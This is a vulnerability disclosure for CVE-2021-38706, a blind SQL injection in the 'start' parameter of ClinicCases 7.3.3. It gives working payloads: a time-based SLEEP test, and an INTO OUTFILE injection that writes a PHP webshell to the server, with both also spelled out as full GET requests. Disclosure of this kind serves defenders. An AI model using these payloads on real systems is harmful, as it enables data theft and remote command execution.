/CVE-2021-38706

Blind SQL Injection in ClinicCases 7.3.3

CVE-2021-38706

Blind SQL Injection in ClinicCases 7.3.3

Details

ClinicCases 7.3.3 suffers from a blind SQL injection vulnerability, which allows low-privileged attackers to execute arbitrary SQL commands through a vulnerable parameter.

The SQL injection can be exploited by all user accounts, including low-privilege "student" users.

The HTTP GET parameter "start" is defined as "$start" in messages_load.php. This parameter is not sanitised and can be used to manipulate the SQL query to execute arbitrary commands from an attacker. For example, an attacker can use the following payload to force the server to sleep for 5 seconds:

0;SELECT SLEEP(5)#

As a GET request:

http://cliniccases.local/cliniccases/lib/php/data/messages_load.php?&start=0;SELECT%20SLEEP(5)#

Screenshot 2021-09-04 at 13 50 29

This can be used with common tools, such as SQLmap, to extract all records in the database. This includes usernames, email addresses, password hashes, etc.

MAP

This could be used to obtain remote command execution on the target by uploading arbitrary PHP code to the server. For example, the following payload uploads a malicious webshell as shell.php to the root of the server using the SQL INTO OUTFILE method. (assuming the attacker has already determined the webroot path):

0;SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/cliniccases/evil.php'#

As a GET request:

http://cliniccases.local/cliniccases/lib/php/data/messages_load.php?&start=0%3bSELECT+%22%3C%3fphp+system($_GET[%27cmd%27])%3b+%3f%3E%22+INTO+OUTFILE+%27/var/www/html/cliniccases/shell.php%27%23

image